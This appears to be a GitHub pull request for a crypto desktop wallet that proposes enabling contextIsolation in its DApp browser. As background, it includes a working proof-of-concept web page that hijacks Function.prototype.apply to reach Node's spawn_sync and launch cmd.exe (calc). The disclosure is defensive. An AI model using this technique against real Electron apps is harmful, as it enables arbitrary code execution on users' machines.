crypto-com / chain-desktop-wallet

Crypto.com DeFi Desktop Wallet
https://crypto.com/defi-wallet

feat: enable contextIsolation in DAppBrowser #1419

Closed XinyuCRO closed 4 months ago

XinyuCRO commented 4 months ago

Background

Test hosting a script as below: (opening the calculator app on Windows)

<!DOCTYPE HTML>
<html>
<h1>test</h1>
<script>
var apply1 = [];
var call1 = [];

Function.prototype._apply = Function.prototype.apply //store original apply prototype
Function.prototype.apply = function(...r) {
    for (var i = 0; i < r.length ; i++ in r) {
        apply1.push(r[i]);
        console.log(r[i]);
    }
};
function rce() { //restore original apply function prototype and execute cmd.exe with arbitrary arguments (/c calc)
    Function.prototype.apply = Function.prototype._apply;
    for (i=0; i<apply1.length; i++) {
        try {
            apply1[i].binding('spawn_sync').spawn({file:"C:\\windows\\system32\\cmd.exe",args:["/c calc"],stdio:[{type:"pipe",readable:!0,writable:!1},{type:"pipe",readable:!1,writable:!0},{type:"pipe",readable:!1,writable:!0}]});
            break;
        } catch(er) {
            console.log(er);
            setTimeout(function(){
                rce()
            },'5000')
        }
    }
};

function leak_process() { //generate enough event listeners to trigger process.warning()
    for (a=0; a<apply1.length; a++) {
        if (apply1[a].addListener) {
            for (i=0; i<11; i++) {
            apply1[a].addListener('x',function(ev){});
            }
        rce();
        break;
        }else {
            continue;
        }
    };
}
setTimeout(function(){
    leak_process();
},'4000');
</script>
</html>

The app will then pop up the Calculator app.

Attempts to fix

socket-security[bot] commented 4 months ago

New and removed dependencies detected. Learn more about Socket for GitHub ↗︎

Package New capabilities Transitives Size Publisher
npm/xmldom@0.5.0 None 0 88.7 kB brodybits

🚮 Removed packages: npm/sleep@6.3.0, npm/zxcvbn@4.4.2


socket-security[bot] commented 4 months ago

👍 Dependency issues cleared. Learn more about Socket for GitHub ↗︎

This PR previously contained dependency changes with security issues that have been resolved, removed, or ignored.
